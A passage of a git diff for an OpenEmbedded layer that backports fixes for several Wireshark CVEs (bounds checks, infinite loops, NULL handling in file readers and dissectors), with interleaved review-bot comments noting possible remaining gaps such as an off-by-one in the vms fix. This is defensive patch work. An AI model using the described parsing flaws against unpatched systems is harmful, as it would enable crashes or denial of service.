++ */ ++ if (msg->data.length > CANFD_MAX_DLEN) { ++ *err = WTAP_ERR_BAD_FILE; ++ if (err_info != NULL) { ++ *err_info = g_strdup_printf("candump: File has %u-byte CAN FD packet, bigger than maximum of %u", ++ msg->data.length, CANFD_MAX_DLEN); ++ } ++ return FALSE; ++ } ++ + canfd_frame.can_id = msg->id; + canfd_frame.flags = msg->flags; + canfd_frame.len = msg->data.length; +@@ -70,6 +83,18 @@ candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg) + { + can_frame_t can_frame = {0}; + ++ /* ++ * There's a maximum of CAN_MAX_DLEN bytes in a CAN frame. ++ */ ++ if (msg->data.length > CAN_MAX_DLEN) { ++ *err = WTAP_ERR_BAD_FILE; ++ if (err_info != NULL) { ++ *err_info = g_strdup_printf("candump: File has %u-byte CAN packet, bigger than maximum of %u", ++ msg->data.length, CAN_MAX_DLEN); ++ } ++ return FALSE; ++ } ++ + can_frame.can_id = msg->id; + can_frame.can_dlc = msg->data.length; + memcpy(can_frame.data, msg->data.data, msg->data.length); +@@ -84,6 +109,8 @@ candump_write_packet(wtap_rec *rec, Buffer *buf, const msg_t *msg) + + rec->rec_header.packet_header.caplen = packet_length; + rec->rec_header.packet_header.len = packet_length; ++ ++ return TRUE; + } + + static gboolean +@@ -190,9 +217,7 @@ candump_read(wtap *wth, wtap_rec *rec, Buffer *buf, int *err, gchar **err_info, + ws_debug_printf("%s: Stopped at offset %" PRIi64 "\n", G_STRFUNC, file_tell(wth->fh)); + #endif + +- candump_write_packet(rec, buf, &msg); +- +- return TRUE; ++ return candump_write_packet(rec, buf, &msg, err, err_info); + } + + static gboolean +@@ -216,9 +241,7 @@ candump_seek_read(wtap *wth , gint64 seek_off, wtap_rec *rec, + if (!candump_parse(wth->random_fh, &msg, NULL, err, err_info)) + return FALSE; + +- candump_write_packet(rec, buf, &msg); +- +- return TRUE; ++ return candump_write_packet(rec, buf, &msg, err, err_info); + } + + /* +-- +2.25.1 + 
diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2856.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2856.patch
new file mode 100644
index 0000000000..863421f986
--- /dev/null
+++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2856.patch
@@ -0,0 +1,69 @@ +From db5135826de3a5fdb3618225c2ff02f4207012ca Mon Sep 17 00:00:00 2001 +From: Guy Harris <gharris@sonic.net> +Date: Thu, 18 May 2023 15:03:23 -0700 +Subject: [PATCH] vms: fix the search for the packet length field. + +The packet length field is of the form + + Total Length = DDD = ^xXXX + +where "DDD" is the length in decimal and "XXX" is the length in +hexadecimal. + +Search for "length ". not just "Length", as we skip past "Length ", not +just "Length", so if we assume we found "Length " but only found +"Length", we'd skip past the end of the string. + +While we're at it, fail if we don't find a length field, rather than +just blithely acting as if the packet length were zero. + +Fixes #19083. + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/db5135826de3a5fdb3618225c2ff02f4207012ca] +CVE: CVE-2023-2856 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + wiretap/vms.c | 9 ++++++++- + 1 file changed, 8 insertions(+), 1 deletion(-) + +diff --git a/wiretap/vms.c b/wiretap/vms.c +index 0aa83ea..5f5fdbb 100644 +--- a/wiretap/vms.c ++++ b/wiretap/vms.c +@@ -318,6 +318,7 @@ parse_vms_packet(FILE_T fh, wtap_rec *rec, Buffer *buf, int *err, gchar **err_in + { + char line[VMS_LINE_LENGTH + 1]; + int num_items_scanned; ++ gboolean have_pkt_len = FALSE; + guint32 pkt_len = 0; + int pktnum; + int csec = 101; +@@ -374,7 +375,7 @@ parse_vms_packet(FILE_T fh, wtap_rec *rec, Buffer *buf, int *err, gchar **err_in + return FALSE; + } + } +- if ( (! pkt_len) && (p = strstr(line, "Length"))) { ++ if ( (! have_pkt_len) && (p = strstr(line, "Length "))) { + p += sizeof("Length "); + while (*p && ! g_ascii_isdigit(*p)) + p++; +@@ -390,9 +391,15 @@ parse_vms_packet(FILE_T fh, wtap_rec *rec, Buffer *buf, int *err, gchar **err_in + *err_info = g_strdup_printf("vms: Length field '%s' not valid", p); + return FALSE; + } ++ have_pkt_len = TRUE; + break; + } + } while (! isdumpline(line)); ++ if (! 
have_pkt_len) { ++ *err = WTAP_ERR_BAD_FILE; ++ *err_info = g_strdup_printf("vms: Length field not found"); ++ return FALSE; ++ } + if (pkt_len > WTAP_MAX_PACKET_SIZE_STANDARD) { + /* + * Probably a corrupt capture file; return an error, +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2858.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2858.patch new file mode 100644 index 0000000000..7174e9155c --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2858.patch 
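Review bot: In the `parse_vms_packet` hunk of the embedded vms.c patch, `p += sizeof("Length ");` still advances 8 bytes after a 7-byte match, because `sizeof` counts the terminating NUL. For a line that ends immediately after "Length " this would leave `p` one byte past the terminator before the `while (*p && ...)` digit scan starts, so the over-skip described in the commit message looks only partly closed. Consider `p += sizeof("Length ") - 1;`, since the loop that follows already skips the `=` and spaces. Separately, `g_strdup_printf("vms: Length field not found")` has no format arguments and could be a plain `g_strdup(...)`. The function body starts and ends outside the hunk, so how `line` is filled is not visible here.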
@@ -0,0 +1,95 @@ +From cb190d6839ddcd4596b0205844f45553f1e77105 Mon Sep 17 00:00:00 2001 +From: Guy Harris <gharris@sonic.net> +Date: Fri, 19 May 2023 16:29:45 -0700 +Subject: [PATCH] netscaler: add more checks to make sure the record is within + the page. + +Whie we're at it, restructure some other checks to test-before-casting - +it's OK to test afterwards, but testing before makes it follow the +pattern used elsewhere. + +Fixes #19081. + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/cb190d6839ddcd4596b0205844f45553f1e77105] +CVE: CVE-2023-2858 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + wiretap/netscaler.c | 15 ++++++++++----- + 1 file changed, 10 insertions(+), 5 deletions(-) + +diff --git a/wiretap/netscaler.c b/wiretap/netscaler.c +index 01a7f6d..4fa020b 100644 +--- a/wiretap/netscaler.c ++++ b/wiretap/netscaler.c +@@ -1091,13 +1091,13 @@ static gboolean nstrace_set_start_time(wtap *wth, int *err, gchar **err_info) + + #define PACKET_DESCRIBE(rec,buf,FULLPART,fullpart,ver,type,HEADERVER) \ + do {\ +- nspr_pktrace##fullpart##_v##ver##_t *type = (nspr_pktrace##fullpart##_v##ver##_t *) &nstrace_buf[nstrace_buf_offset];\ + /* Make sure the record header is entirely contained in the page */\ +- if ((nstrace_buflen - nstrace_buf_offset) < sizeof *type) {\ ++ if ((nstrace_buflen - nstrace_buf_offset) < sizeof(nspr_pktrace##fullpart##_v##ver##_t)) {\ + *err = WTAP_ERR_BAD_FILE;\ + *err_info = g_strdup("nstrace: record header crosses page boundary");\ + return FALSE;\ + }\ ++ nspr_pktrace##fullpart##_v##ver##_t *type = (nspr_pktrace##fullpart##_v##ver##_t *) &nstrace_buf[nstrace_buf_offset];\ + /* Check sanity of record size */\ + if (pletoh16(&type->nsprRecordSize) < sizeof *type) {\ + *err = WTAP_ERR_BAD_FILE;\ +@@ -1162,6 +1162,8 @@ static gboolean nstrace_read_v10(wtap *wth, wtap_rec *rec, Buffer *buf, + + case NSPR_ABSTIME_V10: + { ++ if (!nstrace_ensure_buflen(nstrace, nstrace_buf_offset, 
sizeof(nspr_pktracefull_v10_t), err, err_info)) ++ return FALSE; + nspr_pktracefull_v10_t *fp = (nspr_pktracefull_v10_t *) &nstrace_buf[nstrace_buf_offset]; + if (pletoh16(&fp->nsprRecordSize) == 0) { + *err = WTAP_ERR_BAD_FILE; +@@ -1175,6 +1177,8 @@ static gboolean nstrace_read_v10(wtap *wth, wtap_rec *rec, Buffer *buf, + + case NSPR_RELTIME_V10: + { ++ if (!nstrace_ensure_buflen(nstrace, nstrace_buf_offset, sizeof(nspr_pktracefull_v10_t), err, err_info)) ++ return FALSE; + nspr_pktracefull_v10_t *fp = (nspr_pktracefull_v10_t *) &nstrace_buf[nstrace_buf_offset]; + if (pletoh16(&fp->nsprRecordSize) == 0) { + *err = WTAP_ERR_BAD_FILE; +@@ -1192,6 +1196,8 @@ static gboolean nstrace_read_v10(wtap *wth, wtap_rec *rec, Buffer *buf, + + default: + { ++ if (!nstrace_ensure_buflen(nstrace, nstrace_buf_offset, sizeof(nspr_pktracefull_v10_t), err, err_info)) ++ return FALSE; + nspr_pktracefull_v10_t *fp = (nspr_pktracefull_v10_t *) &nstrace_buf[nstrace_buf_offset]; + if (pletoh16(&fp->nsprRecordSize) == 0) { + *err = WTAP_ERR_BAD_FILE; +@@ -1475,14 +1481,14 @@ static gboolean nstrace_read_v20(wtap *wth, wtap_rec *rec, Buffer *buf, + + #define PACKET_DESCRIBE(rec,buf,FULLPART,ver,enumprefix,type,structname,HEADERVER)\ + do {\ +- nspr_##structname##_t *fp = (nspr_##structname##_t *) &nstrace_buf[nstrace_buf_offset];\ + /* Make sure the record header is entirely contained in the page */\ +- if ((nstrace->nstrace_buflen - nstrace_buf_offset) < sizeof *fp) {\ ++ if ((nstrace->nstrace_buflen - nstrace_buf_offset) < sizeof(nspr_##structname##_t)) {\ + *err = WTAP_ERR_BAD_FILE;\ + *err_info = g_strdup("nstrace: record header crosses page boundary");\ + g_free(nstrace_tmpbuff);\ + return FALSE;\ + }\ ++ nspr_##structname##_t *fp = (nspr_##structname##_t *) &nstrace_buf[nstrace_buf_offset];\ + (rec)->rec_type = REC_TYPE_PACKET;\ + TIMEDEFV##ver((rec),fp,type);\ + FULLPART##SIZEDEFV##ver((rec),fp,ver);\ +@@ -1589,7 +1595,6 @@ static gboolean nstrace_read_v30(wtap *wth, wtap_rec *rec, 
Buffer *buf, + g_free(nstrace_tmpbuff); + return FALSE; + } +- + hdp = (nspr_hd_v20_t *) &nstrace_buf[nstrace_buf_offset]; + if (nspr_getv20recordsize(hdp) == 0) { + *err = WTAP_ERR_BAD_FILE; +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2879.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2879.patch new file mode 100644 index 0000000000..0a8247923e --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2879.patch @@ -0,0 +1,37 @@ +From 118815ca7c9f82c1f83f8f64d9e0e54673f31677 Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Sat, 13 May 2023 21:45:16 -0400 +Subject: [PATCH] GDSDB: Make sure our offset advances. + +add_uint_string() returns the next offset to use, not the number +of bytes consumed. So to consume all the bytes and make sure the +offset advances, return the entire reported tvb length, not the +number of bytes remaining. + +Fixup 8d3c2177793e900cfc7cfaac776a2807e4ea289f +Fixes #19068 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/118815ca7c9f82c1f83f8f64d9e0e54673f31677] +CVE: CVE-2023-2879 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-gdsdb.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/epan/dissectors/packet-gdsdb.c b/epan/dissectors/packet-gdsdb.c +index 75bcfb9..950d68f 100644 +--- a/epan/dissectors/packet-gdsdb.c ++++ b/epan/dissectors/packet-gdsdb.c +@@ -480,7 +480,7 @@ static int add_uint_string(proto_tree *tree, int hf_string, tvbuff_t *tvb, int o + int ret_offset = offset + length; + if (length < 4 || ret_offset < offset) { + expert_add_info_format(NULL, ti, &ei_gdsdb_invalid_length, "Invalid length: %d", length); +- return tvb_reported_length_remaining(tvb, offset); ++ return tvb_reported_length(tvb); + } + return ret_offset; + } +-- +2.25.1 + 
diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2906.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2906.patch new file mode 100644 index 0000000000..fe21097286 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2906.patch @@ -0,0 +1,38 @@ +From 44dc70cc5aadca91cb8ba3710c59c3651b7b0d4d Mon Sep 17 00:00:00 2001 +From: Jaap Keuter <jaap.keuter@xs4all.nl> +Date: Thu, 27 Jul 2023 20:21:19 +0200 +Subject: [PATCH] CP2179: Handle timetag info response without records + +Fixes #19229 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/44dc70cc5aadca91cb8ba3710c59c3651b7b0d4d] +CVE: CVE-2023-2906 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-cp2179.c | 7 +++++-- + 1 file changed, 5 insertions(+), 2 deletions(-) + +diff --git a/epan/dissectors/packet-cp2179.c b/epan/dissectors/packet-cp2179.c +index 30f53f8..70fe033 100644 +--- a/epan/dissectors/packet-cp2179.c ++++ b/epan/dissectors/packet-cp2179.c +@@ -721,11 +721,14 @@ dissect_response_frame(tvbuff_t *tvb, proto_tree *tree, packet_info *pinfo, int + proto_tree_add_item(cp2179_proto_tree, hf_cp2179_timetag_numsets, tvb, offset, 1, ENC_LITTLE_ENDIAN); + + num_records = tvb_get_guint8(tvb, offset) & 0x7F; ++ offset += 1; ++ ++ if (num_records == 0 || numberofcharacters <= 1) ++ break; ++ + recordsize = (numberofcharacters-1) / num_records; + num_values = (recordsize-6) / 2; /* Determine how many 16-bit analog values are present in each event record */ + +- offset += 1; +- + for (x = 0; x < num_records; x++) + { + cp2179_event_tree = proto_tree_add_subtree_format(cp2179_proto_tree, tvb, offset, recordsize, ett_cp2179_event, NULL, "Event Record # %d", x+1); +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-2952.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-2952.patch new file mode 100644 index 0000000000..41b02bb3fa --- /dev/null 
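Review bot: The guard added in `dissect_response_frame` rejects only a zero `num_records` and `numberofcharacters <= 1`, so a `recordsize` below 6 still reaches `num_values = (recordsize-6) / 2;`. The declarations are outside the hunk: if these are unsigned the subtraction wraps, and if they are signed `num_values` goes negative, so the effect depends on types that cannot be seen here. A companion check such as `if (recordsize < 6) break;` right after the division would make the lower bound explicit, though it should be confirmed against upstream behaviour for short records. The enclosing case starts and ends outside the hunk.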
+++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-2952.patch 
@@ -0,0 +1,98 @@ +From ce87eac0325581b600b3093fcd75080df14ccfda Mon Sep 17 00:00:00 2001 +From: Gerald Combs <gerald@wireshark.org> +Date: Tue, 23 May 2023 13:52:03 -0700 +Subject: [PATCH] XRA: Fix an infinite loop + +C compilers don't care what size a value was on the wire. Use +naturally-sized ints, including in dissect_message_channel_mb where we +would otherwise overflow and loop infinitely. + +Fixes #19100 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/e18d0e369729b0fff5f76f41cbae67e97c2e52e5] +CVE: CVE-2023-2952 + +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-xra.c | 16 ++++++++-------- + 1 file changed, 8 insertions(+), 8 deletions(-) + +diff --git a/epan/dissectors/packet-xra.c b/epan/dissectors/packet-xra.c +index 68a8e72..6c7ab74 100644 +--- a/epan/dissectors/packet-xra.c ++++ b/epan/dissectors/packet-xra.c +@@ -478,7 +478,7 @@ dissect_xra_tlv_cw_info(tvbuff_t * tvb, proto_tree * tree, void* data _U_, guint + it = proto_tree_add_item (tree, hf_xra_tlv_cw_info, tvb, 0, tlv_length, ENC_NA); + xra_tlv_cw_info_tree = proto_item_add_subtree (it, ett_xra_tlv_cw_info); + +- guint32 tlv_index =0; ++ unsigned tlv_index = 0; + while (tlv_index < tlv_length) { + guint8 type = tvb_get_guint8 (tvb, tlv_index); + ++tlv_index; +@@ -533,7 +533,7 @@ dissect_xra_tlv_ms_info(tvbuff_t * tvb, proto_tree * tree, void* data _U_, guint + it = proto_tree_add_item (tree, hf_xra_tlv_ms_info, tvb, 0, tlv_length, ENC_NA); + xra_tlv_ms_info_tree = proto_item_add_subtree (it, ett_xra_tlv_ms_info); + +- guint32 tlv_index =0; ++ unsigned tlv_index = 0; + while (tlv_index < tlv_length) { + guint8 type = tvb_get_guint8 (tvb, tlv_index); + ++tlv_index; +@@ -567,7 +567,7 @@ dissect_xra_tlv_burst_info(tvbuff_t * tvb, proto_tree * tree, void* data _U_, gu + it = proto_tree_add_item (tree, hf_xra_tlv_burst_info, tvb, 0, tlv_length, ENC_NA); + xra_tlv_burst_info_tree = proto_item_add_subtree (it, ett_xra_tlv_burst_info); + 
+- guint32 tlv_index =0; ++ unsigned tlv_index = 0; + while (tlv_index < tlv_length) { + guint8 type = tvb_get_guint8 (tvb, tlv_index); + ++tlv_index; +@@ -607,7 +607,7 @@ dissect_xra_tlv(tvbuff_t * tvb, packet_info * pinfo, proto_tree * tree, void* da + it = proto_tree_add_item (tree, hf_xra_tlv, tvb, 0, tlv_length, ENC_NA); + xra_tlv_tree = proto_item_add_subtree (it, ett_xra_tlv); + +- guint32 tlv_index =0; ++ unsigned tlv_index = 0; + tvbuff_t *xra_tlv_cw_info_tvb, *xra_tlv_ms_info_tvb, *xra_tlv_burst_info_tvb; + + while (tlv_index < tlv_length) { +@@ -751,7 +751,7 @@ dissect_message_channel_mb(tvbuff_t * tvb, packet_info * pinfo, proto_tree* tree + if(packet_start_pointer_field_present) { + proto_tree_add_item_ret_uint (tree, hf_plc_mb_mc_psp, tvb, 1, 2, FALSE, &packet_start_pointer); + +- guint16 docsis_start = 3 + packet_start_pointer; ++ unsigned docsis_start = 3 + packet_start_pointer; + while (docsis_start + 6 < remaining_length) { + /*DOCSIS header in packet*/ + guint8 fc = tvb_get_guint8(tvb,docsis_start + 0); +@@ -760,7 +760,7 @@ dissect_message_channel_mb(tvbuff_t * tvb, packet_info * pinfo, proto_tree* tree + docsis_start += 1; + continue; + } +- guint16 docsis_length = 256*tvb_get_guint8(tvb,docsis_start + 2) + tvb_get_guint8(tvb,docsis_start + 3); ++ unsigned docsis_length = 256*tvb_get_guint8(tvb,docsis_start + 2) + tvb_get_guint8(tvb,docsis_start + 3); + if (docsis_start + 6 + docsis_length <= remaining_length) { + /*DOCSIS packet included in packet*/ + tvbuff_t *docsis_tvb; +@@ -830,7 +830,7 @@ dissect_ncp_message_block(tvbuff_t * tvb, proto_tree * tree) { + static int + dissect_plc(tvbuff_t * tvb, packet_info * pinfo, proto_tree * tree, void* data _U_) { + +- guint16 offset = 0; ++ int offset = 0; + proto_tree *plc_tree; + proto_item *plc_item; + tvbuff_t *mb_tvb; +@@ -890,7 +890,7 @@ dissect_plc(tvbuff_t * tvb, packet_info * pinfo, proto_tree * tree, void* data _ + + static int + dissect_ncp(tvbuff_t * tvb, proto_tree * tree, void* data _U_) { 
+- guint16 offset = 0; ++ int offset = 0; + proto_tree *ncp_tree; + proto_item *ncp_item; + tvbuff_t *ncp_mb_tvb; +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2023-4511.patch b/meta-networking/recipes-support/wireshark/files/CVE-2023-4511.patch new file mode 100644 index 0000000000..6a2f20163c --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2023-4511.patch 
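Review bot: The patch header names two different upstream commits: the `From` line carries ce87eac0325581b600b3093fcd75080df14ccfda, while `Upstream-Status: Backport [...]` links to e18d0e369729b0fff5f76f41cbae67e97c2e52e5. One is presumably a release-branch cherry-pick of the other, but the header does not say so, which makes the provenance of this backport harder to audit. Point the Upstream-Status URL at the commit the patch was generated from, or add a line such as `(cherry picked from commit <hash-of-original>)` stating the relation.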
@@ -0,0 +1,81 @@ +From ef9c79ae81b00a63aa8638076ec81dc9482972e9 Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Thu, 10 Aug 2023 05:29:09 -0400 +Subject: [PATCH] btsdp: Keep offset advancing + +hf_data_element_value is a FT_NONE, so we can add the item with +the expected length and get_hfi_length() will adjust the length +without throwing an exception. There's no need to add it with +zero length and call proto_item_set_len. Also, don't increment +the offset by 0 instead of the real length when there isn't +enough data in the packet, as that can lead to failing to advance +the offset. + +When dissecting a sequence type (sequence or alternative) and +recursing into the sequence member, instead of using the main +packet tvb directly, create a subset using the indicated length +of the sequence. That will properly throw an exception if a +contained item is larger than the containing sequence, instead of +dissecting the same bytes as several different items (inside +the sequence recursively, as well in the outer loop.) 
+ +Fix #19258 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/ef9c79ae81b00a63aa8638076ec81dc9482972e9] +CVE: CVE-2023-4511 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + epan/dissectors/packet-btsdp.c | 15 ++++++++------- + 1 file changed, 8 insertions(+), 7 deletions(-) + +diff --git a/epan/dissectors/packet-btsdp.c b/epan/dissectors/packet-btsdp.c +index 397ece7..eb7f5fa 100644 +--- a/epan/dissectors/packet-btsdp.c ++++ b/epan/dissectors/packet-btsdp.c +@@ -1925,13 +1925,11 @@ dissect_data_element(proto_tree *tree, proto_tree **next_tree, + offset += len - length; + } + +- pitem = proto_tree_add_item(ptree, hf_data_element_value, tvb, offset, 0, ENC_NA); ++ pitem = proto_tree_add_item(ptree, hf_data_element_value, tvb, offset, length, ENC_NA); + if (length > tvb_reported_length_remaining(tvb, offset)) { + expert_add_info(pinfo, pitem, &ei_data_element_value_large); +- length = 0; +- } +- proto_item_set_len(pitem, length); +- if (length == 0) ++ proto_item_append_text(pitem, ": MISSING"); ++ } else if (length == 0) + proto_item_append_text(pitem, ": MISSING"); + + if (next_tree) *next_tree = proto_item_add_subtree(pitem, ett_btsdp_data_element_value); +@@ -3523,6 +3521,8 @@ dissect_sdp_type(proto_tree *tree, packet_info *pinfo, tvbuff_t *tvb, + gint bytes_to_go = size; + gint first = 1; + wmem_strbuf_t *substr; ++ tvbuff_t *next_tvb = tvb_new_subset_length(tvb, offset, size); ++ gint next_offset = 0; + + ti = proto_tree_add_item(next_tree, (type == 6) ? 
hf_data_element_value_sequence : hf_data_element_value_alternative, + tvb, offset, size, ENC_NA); +@@ -3537,14 +3537,15 @@ dissect_sdp_type(proto_tree *tree, packet_info *pinfo, tvbuff_t *tvb, + first = 0; + } + +- size = dissect_sdp_type(st, pinfo, tvb, offset, attribute, service_uuid, ++ size = dissect_sdp_type(st, pinfo, next_tvb, next_offset, ++ attribute, service_uuid, + service_did_vendor_id, service_did_vendor_id_source, + service_hdp_data_exchange_specification, service_info, &substr); + if (size < 1) { + break; + } + wmem_strbuf_append_printf(info_buf, "%s ", wmem_strbuf_get_str(substr)); +- offset += size ; ++ next_offset += size; + bytes_to_go -= size; + } + +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/files/CVE-2024-0208.patch b/meta-networking/recipes-support/wireshark/files/CVE-2024-0208.patch new file mode 100644 index 0000000000..4c9f8d29c0 --- /dev/null +++ b/meta-networking/recipes-support/wireshark/files/CVE-2024-0208.patch 
@@ -0,0 +1,42 @@ +From a8586fde3a6512466afb2a660538ef3fe712076b Mon Sep 17 00:00:00 2001 +From: John Thacker <johnthacker@gmail.com> +Date: Thu, 23 Nov 2023 13:47:51 -0500 +Subject: [PATCH] gvcp: Don't try to add a NULL string to a column + +This was caught as an invalid argument by g_strlcpy before 4.2, +but it was never a good idea. + +Fix #19496 + +Upstream-Status: Backport [https://gitlab.com/wireshark/wireshark/-/commit/a8586fde3a6512466afb2a660538ef3fe712076b] +CVE: CVE-2024-0208 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + epan/dissectors/packet-gvcp.c | 7 ++----- + 1 file changed, 2 insertions(+), 5 deletions(-) + +diff --git a/epan/dissectors/packet-gvcp.c b/epan/dissectors/packet-gvcp.c +index 6a17cff..eb849c0 100644 +--- a/epan/dissectors/packet-gvcp.c ++++ b/epan/dissectors/packet-gvcp.c +@@ -2222,15 +2222,12 @@ static void dissect_readreg_ack(proto_tree *gvcp_telegram_tree, tvbuff_t *tvb, p + if (addr_list_size > 0) + { + address_string = get_register_name_from_address(*((guint32*)wmem_array_index(gvcp_trans->addr_list, 0)), gvcp_info, &is_custom_register); ++ col_append_str(pinfo->cinfo, COL_INFO, address_string); + } + + if (num_registers) + { +- col_append_fstr(pinfo->cinfo, COL_INFO, "%s Value=0x%08X", address_string, tvb_get_ntohl(tvb, offset)); +- } +- else +- { +- col_append_str(pinfo->cinfo, COL_INFO, address_string); ++ col_append_sep_fstr(pinfo->cinfo, COL_INFO, " ", "Value=0x%08X", tvb_get_ntohl(tvb, offset)); + } + } + } +-- +2.25.1 + diff --git a/meta-networking/recipes-support/wireshark/wireshark_3.4.12.bb b/meta-networking/recipes-support/wireshark/wireshark_3.4.12.bb index 1a4aedc139..41c363ad30 100644 --- a/meta-networking/recipes-support/wireshark/wireshark_3.4.12.bb +++ b/meta-networking/recipes-support/wireshark/wireshark_3.4.12.bb 
@@ -16,6 +16,19 @@ SRC_URI += " \ file://0003-bison-Remove-line-directives.patch \ file://0004-lemon-Remove-line-directives.patch \ file://CVE-2022-3190.patch \ + file://CVE-2023-2855.patch \ + file://CVE-2023-2856.patch \ + file://CVE-2023-2858.patch \ + file://CVE-2023-2879.patch \ + file://CVE-2023-2952.patch \ + file://CVE-2023-0666.patch \ + file://CVE-2023-0667.patch \ + file://CVE-2023-0668.patch \ + file://CVE-2023-2906.patch \ + file://CVE-2023-1992.patch \ + file://CVE-2022-4345.patch \ + file://CVE-2024-0208.patch \ + file://CVE-2023-4511.patch \ " UPSTREAM_CHECK_URI = "https://1.as.dl.wireshark.org/src" diff --git a/meta-oe/conf/layer.conf b/meta-oe/conf/layer.conf index 88715d5e82..a0c644a2f4 100644 --- a/meta-oe/conf/layer.conf +++ b/meta-oe/conf/layer.conf @@ -47,6 +47,7 @@ LAYERSERIES_COMPAT_openembedded-layer = "kirkstone" LICENSE_PATH += "${LAYERDIR}/licenses" PREFERRED_RPROVIDER_libdevmapper = "lvm2" +PREFERRED_RPROVIDER_libdevmapper-native = "lvm2-native" PREFERRED_PROVIDER_android-tools-conf ?= "android-tools-conf" SIGGEN_EXCLUDERECIPES_ABISAFE += " \ @@ -105,4 +106,4 @@ SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += " \ DEFAULT_TEST_SUITES:pn-meta-oe-ptest-image = " ${PTESTTESTSUITE}" -NON_MULTILIB_RECIPES:append = " crash" +NON_MULTILIB_RECIPES:append = " crash pahole" diff --git a/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb b/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb index 7bca24cc0a..b59fc1bc95 100644 --- a/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb +++ b/meta-oe/dynamic-layers/meta-python/recipes-bsp/rwmem/rwmem_1.2.bb @@ -22,7 +22,7 @@ SRCREV_FORMAT = "rwmem_inih" SRC_URI = " \ git://github.com/tomba/rwmem.git;protocol=https;name=rwmem;branch=master \ - git://github.com/benhoyt/inih.git;protocol=https;name=inih;nobranch=1;destsuffix=git/ext/inih \ + git://github.com/benhoyt/inih.git;protocol=https;name=inih;branch=master;destsuffix=git/ext/inih \ " S = "${WORKDIR}/git" 
diff --git a/meta-oe/dynamic-layers/meta-python/recipes-connectivity/lirc/lirc_0.10.1.bb b/meta-oe/dynamic-layers/meta-python/recipes-connectivity/lirc/lirc_0.10.1.bb index fe9685924b..226543bbd8 100644 --- a/meta-oe/dynamic-layers/meta-python/recipes-connectivity/lirc/lirc_0.10.1.bb +++ b/meta-oe/dynamic-layers/meta-python/recipes-connectivity/lirc/lirc_0.10.1.bb @@ -49,9 +49,9 @@ do_configure:append() { # Create PYTHON_TARBALL which LIRC needs for install-nodist_pkgdataDATA do_install:prepend() { - rm -rf ${WORKDIR}/${PN}-${PV}/python-pkg/dist/ - mkdir ${WORKDIR}/${PN}-${PV}/python-pkg/dist/ - tar --exclude='${WORKDIR}/${PN}-${PV}/python-pkg/*' -czf ${WORKDIR}/${PN}-${PV}/python-pkg/dist/${PN}-${PV}.tar.gz ${S} + rm -rf ${S}/python-pkg/dist/ + mkdir ${S}/python-pkg/dist/ + tar --exclude='${S}/python-pkg/*' -czf ${S}/python-pkg/dist/${BP}.tar.gz ${S} } # In code, path to python is a variable that is replaced with path to native version of it diff --git a/meta-oe/dynamic-layers/meta-python/recipes-core/packagegroups/packagegroup-meta-oe.bbappend b/meta-oe/dynamic-layers/meta-python/recipes-core/packagegroups/packagegroup-meta-oe.bbappend index 09f3e34f4c..e1db8bac9e 100644 --- a/meta-oe/dynamic-layers/meta-python/recipes-core/packagegroups/packagegroup-meta-oe.bbappend +++ b/meta-oe/dynamic-layers/meta-python/recipes-core/packagegroups/packagegroup-meta-oe.bbappend @@ -11,7 +11,7 @@ RDEPENDS:packagegroup-meta-oe-connectivity += "\ RDEPENDS:packagegroup-meta-oe-extended += "\ lcdproc \ - mozjs \ + mozjs-91 \ " RDEPENDS:packagegroup-meta-oe-support += "\ smem \ diff --git a/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb b/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb index ff4a16e9f2..0969fb6ce2 100644 --- a/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb +++ b/meta-oe/dynamic-layers/meta-python/recipes-dbs/mongodb/mongodb_git.bb 
